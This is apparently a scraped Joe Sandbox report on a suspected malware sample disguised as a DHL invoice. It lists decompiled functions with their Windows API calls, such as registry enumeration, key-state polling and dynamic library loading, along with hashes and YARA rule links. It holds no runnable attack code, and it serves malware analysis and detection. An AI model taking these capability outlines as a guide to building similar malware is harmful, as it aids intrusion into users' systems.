Instruction ID: 95400e1d2d0fa966694519fe2e5a02c57ec9b3ba0d585f019739663d3c1773bc
Opcode Fuzzy Hash: 88f8f03b69e6703ba13bc5b16fb2a74baf04700e170ef836a7749c059c046656
Instruction Fuzzy Hash: 5B51C5B191021AEFDB24EF799C819FFBBBCAF41350F10426EEA54D7194EB709A418B50

Function 012AE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 012ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,012ACF22,?), ref: 012ADDFD

Part of subcall function 012ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,012ACF22,?), ref: 012ADE16

Part of subcall function 012AE199: GetFileAttributesW.KERNEL32(?,012ACF95), ref: 012AE19A

lstrcmpiW.KERNEL32(?,?), ref: 012AE473
MoveFileW.KERNEL32 ref: 012AE4AC
_wcslen.LIBCMT ref: 012AE5EB
_wcslen.LIBCMT ref: 012AE603
SHFileOperationW.SHELL32 ref: 012AE650

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 2318317a07a6b91d628e6b45402152d2aeb57a6020515a96661cd8e3290a5d03
Instruction ID: f78b1fbcf15e2e7a3d7b539407b2963040e684a35b92aa915470a53e59acca36
Opcode Fuzzy Hash: 2318317a07a6b91d628e6b45402152d2aeb57a6020515a96661cd8e3290a5d03
Instruction Fuzzy Hash: A95175B24183869BD724EBA4D8809EFB7DCAF94344F40491EE789D3190EF74A189C766

Function 012CB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012CC998: CharUpperBuffW.USER32(?,?), ref: 012CC9B5
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CC9F1
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CCA68
Part of subcall function 012CC998: _wcslen.LIBCMT ref: 012CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 012CBAA5
RegOpenKeyExW.ADVAPI32 ref: 012CBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 012CBB63
RegCloseKey.ADVAPI32(?), ref: 012CBBA6
RegCloseKey.ADVAPI32(00000000), ref: 012CBBB3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: a6a0a1094074e51f54acbfa5912d2efa95088d8f484dbf632e8fae3d8bab9291
Instruction ID: 356c091a10e9b8040b995a210439beebd2aa6fcb7aa1e58c1e7d4b51ece1b9fd
Opcode Fuzzy Hash: a6a0a1094074e51f54acbfa5912d2efa95088d8f484dbf632e8fae3d8bab9291
Instruction Fuzzy Hash: BB61D431128242AFD714DF18C491E3ABBE5FF84748F14865CF6998B291DB31ED45CB91

Function 012A8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 012A8BCD
VariantClear.OLEAUT32 ref: 012A8C3E
VariantClear.OLEAUT32 ref: 012A8C9D
VariantClear.OLEAUT32(?), ref: 012A8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 012A8D3B

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 36cb2bfff5d2da6bb688ec2485197952537bede1d18b83a021cce41bdc87f978
Instruction ID: 84c645bfc364aa4c1f36ac58244c658115cc9d0277bfad57527e5461fa886c59
Opcode Fuzzy Hash: 36cb2bfff5d2da6bb688ec2485197952537bede1d18b83a021cce41bdc87f978
Instruction Fuzzy Hash: 62516AB5A1061AEFCB14CF68D884AAABBF9FF89310B058559E905DB314E730E911CF90

Function 012B8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 012B8BAE
GetPrivateProfileSectionW.KERNEL32 ref: 012B8BDA
WritePrivateProfileSectionW.KERNEL32 ref: 012B8C32
WritePrivateProfileStringW.KERNEL32 ref: 012B8C57
WritePrivateProfileStringW.KERNEL32 ref: 012B8C5F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 299b367ae7bbd7885025bc0b4c5e7f628c9662ed2efe7fb6f3104ff8ecce228e
Instruction ID: a57b3d8a3b6d2538d009ec5b0abad3465d89e4adf29e1bded4efa381657b7fab
Opcode Fuzzy Hash: 299b367ae7bbd7885025bc0b4c5e7f628c9662ed2efe7fb6f3104ff8ecce228e
Instruction Fuzzy Hash: E0516835A10216AFCB19DF64C884AAEBBF5FF48314F088458E949AB361DB31ED51CB90

Function 012C8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 012C8F40
GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 012C8FD0
GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 012C8FEC
GetProcAddress.KERNEL32(00000000,?,00000041), ref: 012C9032
FreeLibrary.KERNEL32(00000000), ref: 012C9052

Part of subcall function 0125F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,012B1043,?,759D3F18), ref: 0125F6E6
Part of subcall function 0125F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0129FA64,00000000,00000000,?,?,012B1043,?,759D3F18,?,0129FA64), ref: 0125F70D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 96951bf0aa31ff7ea630041136c6962578a4d76438185f4e7e68d515b0f7d5f3
Instruction ID: f0ebecff934ee1bcde1935f1d16822223417676b454f9d602bbda5c64f3e7eb9
Opcode Fuzzy Hash: 96951bf0aa31ff7ea630041136c6962578a4d76438185f4e7e68d515b0f7d5f3
Instruction Fuzzy Hash: B6515C35A11216DFCB15DF68C0848ADBBF1FF59718B048198EA1A9B361DB31ED86CB90

Function 012D6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 012D6C33
SetWindowLongW.USER32 ref: 012D6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 012D6C73
ShowWindow.USER32(00000002,00000000), ref: 012D6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 012D6CC7

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 39102f26cba53fc397241cb6a168adb66d402a88f8f538bc35866f16e3adc4a1
Instruction ID: bb618f6ebac6056f905a0d85e0b474d6bfc116b593aa97107513c3d15bd1d433
Opcode Fuzzy Hash: 39102f26cba53fc397241cb6a168adb66d402a88f8f538bc35866f16e3adc4a1
Instruction Fuzzy Hash: A641D235E24105AFEB24CF2CC84DFA97FA9EB09360F150228FA15A72D0D771AD51CB80

Function 01272051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 012720C3
_free.LIBCMT ref: 012720E3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 38c64bd2f788dc61091ad6e824d941a0832135af5686860cfbe825c8b4ed170e
Instruction ID: cb08dab98933969d612581096c29a7e14a7d8e5d3f6ccdce8524d2b1f87e7535
Opcode Fuzzy Hash: 38c64bd2f788dc61091ad6e824d941a0832135af5686860cfbe825c8b4ed170e
Instruction Fuzzy Hash: A041E236A10201DFCB25DF78C880A6EB7F6EF89710F1545A9EA15EB392D631A901CB90

Function 0125912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 01259141
ScreenToClient.USER32(00000000,?), ref: 0125915E
GetAsyncKeyState.USER32 ref: 01259183
GetAsyncKeyState.USER32 ref: 0125919D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: eb9d443388a8d05e4a841f1bf9d9ee9a6e4a33ef2bcbf77b2aa6d3a91c9f7b19
Instruction ID: 1543291efdf5c49c8ecc0e4e9700f45d46ca0a2ea05eae606ea4f5840b52c5a6
Opcode Fuzzy Hash: eb9d443388a8d05e4a841f1bf9d9ee9a6e4a33ef2bcbf77b2aa6d3a91c9f7b19
Instruction Fuzzy Hash: BB417E71A2461BEBDF159F68C888BEEBB75FB05324F108219E925A3290C7705990CF91

Function 012B3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 012B38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 012B3922
TranslateMessage.USER32(?), ref: 012B394B
DispatchMessageW.USER32(?), ref: 012B3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 012B3966

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: ac86479ddbc8b14096f34425df01afed669ca608c5f4531497679a16c232a919
Instruction ID: ec26e6e72156f5b83ae0c1e96945178a46cc593ba4a8817534445b04941b043b
Opcode Fuzzy Hash: ac86479ddbc8b14096f34425df01afed669ca608c5f4531497679a16c232a919
Instruction Fuzzy Hash: 2431A270924B43EEFB35CA38D889BF63BA8BB05384F04456DD76282195E7B4A085CB11

Function 012A1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 012A1915
PostMessageW.USER32 ref: 012A19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 012A19C9
PostMessageW.USER32 ref: 012A19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 012A19E2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: ef56df53192918c02713e21685fd94919a952c5541d9b279932fd2afda54c332
Instruction ID: 9df10c260872edda19ab7b943ae663ea83d3e16c1e6b2cc70f0ca43df5a73acb
Opcode Fuzzy Hash: ef56df53192918c02713e21685fd94919a952c5541d9b279932fd2afda54c332
Instruction Fuzzy Hash: E231B67191021AEFCB14CFACD94DADE7BB5EB44325F404229FA21A72D1C7709964CB90

Function 012D5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 012D5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 012D579D
_wcslen.LIBCMT ref: 012D57AF
_wcslen.LIBCMT ref: 012D57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 012D5816

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: b776c4a510958ab8db3058dd800b4f3a91916131cb3a8d8862cad50ade77a420
Instruction ID: 5e60cb0140c9e9704468493763fef8ac2abbbc68fc8504753ef35d0d3e598ec0
Opcode Fuzzy Hash: b776c4a510958ab8db3058dd800b4f3a91916131cb3a8d8862cad50ade77a420
Instruction Fuzzy Hash: 0921D831D24219DAEB209F64CC85AED7BBCFF54324F10821AEA29EB1C4D7B09585CF50

Function 012C0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 012C0951
GetForegroundWindow.USER32 ref: 012C0968
GetDC.USER32(00000000), ref: 012C09A4
GetPixel.GDI32(00000000,?,00000003), ref: 012C09B0
ReleaseDC.USER32(00000000,00000003), ref: 012C09E8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 6c07b7d16021ea78071d6b9ca54d4a2e729183b4f7780e6f45fa6c765b2ff354
Instruction ID: bd535c730d2d5d3608e38e0dd8a3b7e82186d8f1180a2534c92b62e2bda591fc
Opcode Fuzzy Hash: 6c07b7d16021ea78071d6b9ca54d4a2e729183b4f7780e6f45fa6c765b2ff354
Instruction Fuzzy Hash: 35218135A10214AFD714EF69D888AAEBBF9EF54B40F04806DE94A97350CA70EC04CB90

Function 0127CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0127CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0127CDE9

Part of subcall function 01273820: RtlAllocateHeap.NTDLL(00000000,?,01311444,?,0125FDF5,?,?,0124A976,00000010,01311440,012413FC,?,012413C6,?,01241129), ref: 01273852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0127CE0F
_free.LIBCMT ref: 0127CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0127CE31

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 12a8f297da75ece84fb849d876b3f9f75c56fcb2a56d27731be468959d08a55b
Instruction ID: 8cb7a80d99a904d7b18a43fd2de93ca915d962e68b83ddf80bdca238ba06c7e2
Opcode Fuzzy Hash: 12a8f297da75ece84fb849d876b3f9f75c56fcb2a56d27731be468959d08a55b
Instruction Fuzzy Hash: D9018472A226177F372116BAAC8CD7B6D6DEFC69A1315052DFB05C7204EE718D2282B0

Function 01259639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 01259693
SelectObject.GDI32(?,00000000), ref: 012596A2
BeginPath.GDI32(?), ref: 012596B9
SelectObject.GDI32(?,00000000), ref: 012596E2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 89ffecf90b14f1203b33c38246253f43841f4b9806eb33cbcde33ea926bf1ac4
Instruction ID: 31d477bc8a44b94045f3b1160393f89da7881419f91b615a91ff08ca7683b017
Opcode Fuzzy Hash: 89ffecf90b14f1203b33c38246253f43841f4b9806eb33cbcde33ea926bf1ac4
Instruction Fuzzy Hash: D6216871822306DFDF219F78E8497E97B6EBB40359F104215FB2096198D3749495CFE4

Function 012A5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 012A5726
_memcmp.LIBVCRUNTIME ref: 012A5744
_memcmp.LIBVCRUNTIME ref: 012A5757
_memcmp.LIBVCRUNTIME ref: 012A576F
_memcmp.LIBVCRUNTIME ref: 012A5787

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ff0179b5b50ea22d64400f728158bb842d517bbdfe6c1117b7eef7cc96051600
Instruction ID: 1783ccd995aaa096b63fae3bfb6bb546443acae163a343efa0f710e7d025ad26
Opcode Fuzzy Hash: ff0179b5b50ea22d64400f728158bb842d517bbdfe6c1117b7eef7cc96051600
Instruction Fuzzy Hash: 5C01F5612B1206FBE31C92159E82FBB774C9B602A4F804024FE16BA240F760FD7183A4

Function 01272DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0126F2DE,01273863,01311444,?,0125FDF5,?,?,0124A976,00000010,01311440,012413FC,?,012413C6), ref: 01272DFD
_free.LIBCMT ref: 01272E32
_free.LIBCMT ref: 01272E59
SetLastError.KERNEL32(00000000,01241129), ref: 01272E66
SetLastError.KERNEL32(00000000,01241129), ref: 01272E6F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 502f47744a1d760e738b122a290cabf6674d1377e700b138033afc3986a5922f
Instruction ID: cbdafc9244b5578ab8c80ff8b255180207a84a2408b97bcc9cdd016651a139ac
Opcode Fuzzy Hash: 502f47744a1d760e738b122a290cabf6674d1377e700b138033afc3986a5922f
Instruction Fuzzy Hash: C7012832636603F7C627663C7C49D3B259DABD52B5B24092DF921A22C6EF7098418220

Function 012A000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 012A002B
ProgIDFromCLSID.OLE32(?,00000000), ref: 012A0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0129FF41,80070057,?,?), ref: 012A0054
CoTaskMemFree.OLE32(00000000), ref: 012A0064
CLSIDFromString.OLE32(?,?), ref: 012A0070

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

